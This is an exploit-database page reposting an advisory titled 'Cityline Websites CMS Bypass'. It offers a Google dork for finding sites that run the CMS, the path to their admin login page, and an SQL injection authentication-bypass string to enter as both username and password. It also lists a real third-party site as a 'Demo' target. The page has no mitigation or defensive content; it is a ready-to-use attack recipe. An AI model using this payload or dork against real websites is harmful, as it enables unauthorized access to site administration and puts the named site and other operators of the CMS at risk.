Cityline Websites CMS Bypass

2016.08.26
ir Eagle Security Team (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: "Cityline Websites" inurl:login.php

######################################################## # Exploit Title: Cityline Websites CMS Bypass # Google Dork: "Cityline Websites" inurl:login.php # Date : 2016/08/22 # Exploit Author: Eagle Security Team # Vendor Homepage: http://www.citylinewebsites.com/ # Tested on: [Win 10/Google chrome] # Video: youtu.be/M_GD1Kwdwr0 ######################################################## # Admin Panel: # # Put admin/login.php After url such as : # # Site/[PATH]/admin/login.php # # # Username : '=' 'or' # Password : '=' 'or' # # ######################################################## # Demo: # # http://golfgroups.ca/members/login.php # ######################################################## # Telegram.me/Eagle_Security # # Discovered By: Mr.Keeper # Email: eaglesecteam.ir@gmail.com ########################################################

References:

https://telegram.me/Eagle_Security
https://youtu.be/M_GD1Kwdwr0


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top